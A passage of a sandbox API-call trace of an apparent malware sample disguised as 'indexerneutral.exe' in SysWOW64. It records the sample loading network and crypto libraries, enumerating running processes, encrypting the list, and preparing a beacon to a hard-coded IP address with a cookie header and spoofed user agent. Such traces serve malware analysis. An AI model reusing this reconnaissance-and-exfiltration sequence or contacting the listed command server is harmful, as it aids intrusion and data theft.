(lpFileName="C:\\Windows\\SysWOW64\\eulacompile.exe" (normalized: "c:\\windows\\syswow64\\eulacompile.exe")) returned 0 [0149.904] lstrcmpiW (lpString1="C:\\Windows\\SysWOW64\\indexerneutral.exe", lpString2="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned 0 [0149.906] GetTickCount () returned 0x29acf [0149.906] GetTickCount () returned 0x29acf [0149.907] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0149.907] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0150.855] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0150.855] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1154708 [0150.855] GetTickCount () returned 0x29e88 [0150.856] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0150.856] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0151.868] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0151.869] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1154aff [0151.869] GetTickCount () returned 0x2a27f [0151.869] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0151.869] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0152.868] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0152.868] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1154ee7 [0152.869] GetTickCount () returned 0x2a667 [0152.869] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0152.869] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0153.884] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0153.884] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11552df [0153.884] GetTickCount () returned 0x2aa5f [0153.884] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0153.884] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0154.884] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0154.884] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11556c7 [0154.884] GetTickCount () returned 0x2ae47 [0154.884] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0154.884] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0155.887] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0155.887] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11576c2 [0155.887] GetTickCount () returned 0x2b22f [0155.887] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x74880000 [0156.432] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x745f0000 [0157.932] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76c70000 [0157.932] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74300000 [0158.282] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x740d0000 [0159.151] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x740c0000 [0159.621] CryptAcquireContextW (in: phProv=0x417ca0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000040 | out: phProv=0x417ca0*=0x652f28) returned 1 [0159.633] CryptDecodeObjectEx (in: dwCertEncodingType=0x10001, lpszStructType=0x13, pbEncoded=0x413430, cbEncoded=0x6a, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x19fd40, pcbStructInfo=0x19fd3c | out: pvStructInfo=0x19fd40, pcbStructInfo=0x19fd3c) returned 1 [0159.635] CryptImportKey (in: hProv=0x652f28, pbData=0x652130, dwDataLen=0x74, hPubKey=0x0, dwFlags=0x0, phKey=0x417ca4 | out: phKey=0x417ca4*=0x64d888) returned 1 [0159.638] LocalFree (hMem=0x652130) returned 0x0 [0159.638] CryptGenKey (in: hProv=0x652f28, Algid=0x660e, dwFlags=0x1, phKey=0x417ca8 | out: phKey=0x417ca8*=0x64d6c8) returned 1 [0159.640] CryptCreateHash (in: hProv=0x652f28, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x417cac | out: phHash=0x417cac) returned 1 [0159.640] GetTickCount () returned 0x2c0d5 [0159.640] GetTickCount () returned 0x2c0d5 [0159.640] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0159.640] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0159.640] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0159.640] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1156955 [0159.640] GetTickCount () returned 0x2c0d5 [0159.640] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0159.640] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0160.625] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0160.625] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1156d2d [0160.625] GetTickCount () returned 0x2c4ad [0160.625] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0160.625] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0161.629] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0161.630] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1157125 [0161.630] GetTickCount () returned 0x2c8a5 [0161.630] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0161.630] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0162.645] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0162.645] DispatchMessageW (lpMsg=0x19ff2c) returned 0x115751d [0162.645] GetTickCount () returned 0x2cc9d [0162.645] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0162.645] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0163.645] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0163.645] DispatchMessageW (lpMsg=0x19ff2c) [0163.645] GetTickCount () returned 0x2d085 [0163.645] GetTickCount () returned 0x2d085 [0163.645] GetTickCount () returned 0x2d085 [0163.645] lstrlenA (lpString="LHNIWSJ_D2CA4DEF") returned 16 [0163.645] RtlGetVersion (in: lpVersionInformation=0x19fc38 | out: lpVersionInformation=0x19fc38*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0163.645] GetNativeSystemInfo (in: lpSystemInfo=0x19fc14 | out: lpSystemInfo=0x19fc14*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0163.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc [0163.647] Process32FirstW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.648] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x63, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.648] GetCurrentProcessId () returned 0xc80 [0163.649] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.649] GetCurrentProcessId () returned 0xc80 [0163.649] GetCurrentProcessId () returned 0xc80 [0163.649] lstrcpyW (in: lpString1=0x65562c, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.649] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x14c, pcPriClassBase=15, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.650] GetCurrentProcessId () returned 0xc80 [0163.650] GetCurrentProcessId () returned 0xc80 [0163.650] lstrcpyW (in: lpString1=0x655844, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.650] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.650] GetCurrentProcessId () returned 0xc80 [0163.650] GetCurrentProcessId () returned 0xc80 [0163.650] lstrcpyW (in: lpString1=0x655a5c, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.650] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.651] GetCurrentProcessId () returned 0xc80 [0163.651] GetCurrentProcessId () returned 0xc80 [0163.651] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.652] GetCurrentProcessId () returned 0xc80 [0163.652] GetCurrentProcessId () returned 0xc80 [0163.652] lstrcpyW (in: lpString1=0x655c74, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.652] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.652] GetCurrentProcessId () returned 0xc80 [0163.652] GetCurrentProcessId () returned 0xc80 [0163.652] lstrcpyW (in: lpString1=0x655e8c, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.652] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.653] GetCurrentProcessId () returned 0xc80 [0163.653] GetCurrentProcessId () returned 0xc80 [0163.653] lstrcpyW (in: lpString1=0x6560a4, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.653] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.654] GetCurrentProcessId () returned 0xc80 [0163.654] GetCurrentProcessId () returned 0xc80 [0163.654] lstrcpyW (in: lpString1=0x6562bc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.654] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.654] GetCurrentProcessId () returned 0xc80 [0163.654] GetCurrentProcessId () returned 0xc80 [0163.654] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.655] GetCurrentProcessId () returned 0xc80 [0163.655] GetCurrentProcessId () returned 0xc80 [0163.655] lstrcpyW (in: lpString1=0x6564d4, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.655] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.655] GetCurrentProcessId () returned 0xc80 [0163.655] GetCurrentProcessId () returned 0xc80 [0163.655] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.656] GetCurrentProcessId () returned 0xc80 [0163.656] GetCurrentProcessId () returned 0xc80 [0163.656] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.657] GetCurrentProcessId () returned 0xc80 [0163.657] GetCurrentProcessId () returned 0xc80 [0163.657] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.657] GetCurrentProcessId () returned 0xc80 [0163.657] GetCurrentProcessId () returned 0xc80 [0163.657] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.658] GetCurrentProcessId () returned 0xc80 [0163.658] GetCurrentProcessId () returned 0xc80 [0163.658] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.658] GetCurrentProcessId () returned 0xc80 [0163.658] GetCurrentProcessId () returned 0xc80 [0163.658] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.659] GetCurrentProcessId () returned 0xc80 [0163.659] GetCurrentProcessId () returned 0xc80 [0163.659] lstrcpyW (in: lpString1=0x6566ec, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.659] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.659] GetCurrentProcessId () returned 0xc80 [0163.660] GetCurrentProcessId () returned 0xc80 [0163.660] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.660] GetCurrentProcessId () returned 0xc80 [0163.660] GetCurrentProcessId () returned 0xc80 [0163.660] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0163.661] GetCurrentProcessId () returned 0xc80 [0163.661] GetCurrentProcessId () returned 0xc80 [0163.661] lstrcpyW (in: lpString1=0x656904, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0163.661] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.662] GetCurrentProcessId () returned 0xc80 [0163.662] GetCurrentProcessId () returned 0xc80 [0163.662] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0163.662] GetCurrentProcessId () returned 0xc80 [0163.662] GetCurrentProcessId () returned 0xc80 [0163.662] lstrcpyW (in: lpString1=0x656b1c, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0163.662] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.663] GetCurrentProcessId () returned 0xc80 [0163.663] GetCurrentProcessId () returned 0xc80 [0163.663] lstrcpyW (in: lpString1=0x656d34, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.663] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.664] GetCurrentProcessId () returned 0xc80 [0163.664] GetCurrentProcessId () returned 0xc80 [0163.664] lstrcpyW (in: lpString1=0x656f4c, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.664] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xad0, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0163.664] GetCurrentProcessId () returned 0xc80 [0163.664] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0163.665] GetCurrentProcessId () returned 0xc80 [0163.665] GetCurrentProcessId () returned 0xc80 [0163.665] lstrcpyW (in: lpString1=0x657164, lpString2="LogonUI.exe" | out: lpString1="LogonUI.exe") returned="LogonUI.exe" [0163.665] Process32NextW (in: hSnapshot=0x1fc, lppe=0x19f964 | out: lppe=0x19f964*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0163.666] CloseHandle (hObject=0x1fc) returned 1 [0163.666] lstrlenW (lpString="LogonUI.exe") returned 11 [0163.666] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.666] lstrlenW (lpString="audiodg.exe") returned 11 [0163.666] lstrlenW (lpString="SearchUI.exe") returned 12 [0163.666] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0163.666] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.666] lstrlenW (lpString="dwm.exe") returned 7 [0163.666] lstrlenW (lpString="svchost.exe") returned 11 [0163.666] lstrlenW (lpString="lsass.exe") returned 9 [0163.666] lstrlenW (lpString="services.exe") returned 12 [0163.666] lstrlenW (lpString="winlogon.exe") returned 12 [0163.666] lstrlenW (lpString="wininit.exe") returned 11 [0163.666] lstrlenW (lpString="csrss.exe") returned 9 [0163.666] lstrlenW (lpString="smss.exe") returned 8 [0163.666] lstrcpyW (in: lpString1=0x657378, lpString2="LogonUI.exe" | out: lpString1="LogonUI.exe") returned="LogonUI.exe" [0163.666] lstrlenW (lpString="LogonUI.exe") returned 11 [0163.666] lstrcpyW (in: lpString1=0x657390, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.666] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.666] lstrcpyW (in: lpString1=0x6573a6, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.666] lstrlenW (lpString="audiodg.exe") returned 11 [0163.666] lstrcpyW (in: lpString1=0x6573be, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0163.666] lstrlenW (lpString="SearchUI.exe") returned 12 [0163.666] lstrcpyW (in: lpString1=0x6573d8, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0163.666] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0163.666] lstrcpyW (in: lpString1=0x657402, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.666] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.667] lstrcpyW (in: lpString1=0x65741a, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.667] lstrlenW (lpString="dwm.exe") returned 7 [0163.667] lstrcpyW (in: lpString1=0x65742a, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.667] lstrlenW (lpString="svchost.exe") returned 11 [0163.667] lstrcpyW (in: lpString1=0x657442, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.667] lstrlenW (lpString="lsass.exe") returned 9 [0163.667] lstrcpyW (in: lpString1=0x657456, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.667] lstrlenW (lpString="services.exe") returned 12 [0163.667] lstrcpyW (in: lpString1=0x657470, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.667] lstrlenW (lpString="winlogon.exe") returned 12 [0163.667] lstrcpyW (in: lpString1=0x65748a, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.667] lstrlenW (lpString="wininit.exe") returned 11 [0163.667] lstrcpyW (in: lpString1=0x6574a2, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.667] lstrlenW (lpString="csrss.exe") returned 9 [0163.667] lstrcpyW (in: lpString1=0x6574b6, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.667] lstrlenW (lpString="smss.exe") returned 8 [0163.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LogonUI.exe,sppsvc.exe,audiodg.exe,SearchUI.exe,OfficeClickToRun.exe,spoolsv.exe,dwm.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,냜銼婻", cchWideChar=168, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 168 [0163.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LogonUI.exe,sppsvc.exe,audiodg.exe,SearchUI.exe,OfficeClickToRun.exe,spoolsv.exe,dwm.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,놩婻ࠀ", cchWideChar=168, lpMultiByteStr=0x6574d0, cbMultiByte=168, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LogonUI.exe,sppsvc.exe,audiodg.exe,SearchUI.exe,OfficeClickToRun.exe,spoolsv.exe,dwm.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,ò°¼¼FZ", lpUsedDefaultChar=0x0) returned 168 [0163.675] CryptDuplicateHash (in: hHash=0x64dcc8, pdwReserved=0x0, dwFlags=0x0, phHash=0x19faec | out: phHash=0x19faec) returned 1 [0163.677] CryptEncrypt (in: hKey=0x64d6c8, hHash=0x64da48, Final=1, dwFlags=0x0, pbData=0x655754*, pdwDataLen=0x19fad4*=0xa9, dwBufLen=0xb0 | out: pbData=0x655754*, pdwDataLen=0x19fad4*=0xb0) returned 1 [0163.679] CryptExportKey (in: hKey=0x64d6c8, hExpKey=0x64d888, dwBlobType=0x1, dwFlags=0x40, pbData=0x19fa48, pdwDataLen=0x19fab4 | out: pbData=0x19fa48*, pdwDataLen=0x19fab4*=0x6c) returned 1 [0163.679] CryptGetHashParam (in: hHash=0x64da48, dwParam=0x2, pbData=0x655740, pdwDataLen=0x19fad0, dwFlags=0x0 | out: pbData=0x655740, pdwDataLen=0x19fad0) returned 1 [0163.679] CryptDestroyHash (hHash=0x64da48) returned 1 [0163.679] _snwprintf (in: _Dest=0x19fb00, _Count=0x40, _Format="%u.%u.%u.%u" | out: _Dest="41.57.104.182") returned 13 [0163.679] GetTickCount () returned 0x2d0a4 [0163.679] _snwprintf (in: _Dest=0x655810, _Count=0x1c8, _Format="Cookie: %u=" | out: _Dest="Cookie: 31289=") returned 14 [0163.680] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x19f6ac, cbSize=0x19faac | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x19faac) returned 0x0 [0163.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6ac, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0163.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6ac, cbMultiByte=-1, lpWideCharStr=0x662090, cchWideChar=151 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/8.0; .NET4.0C; 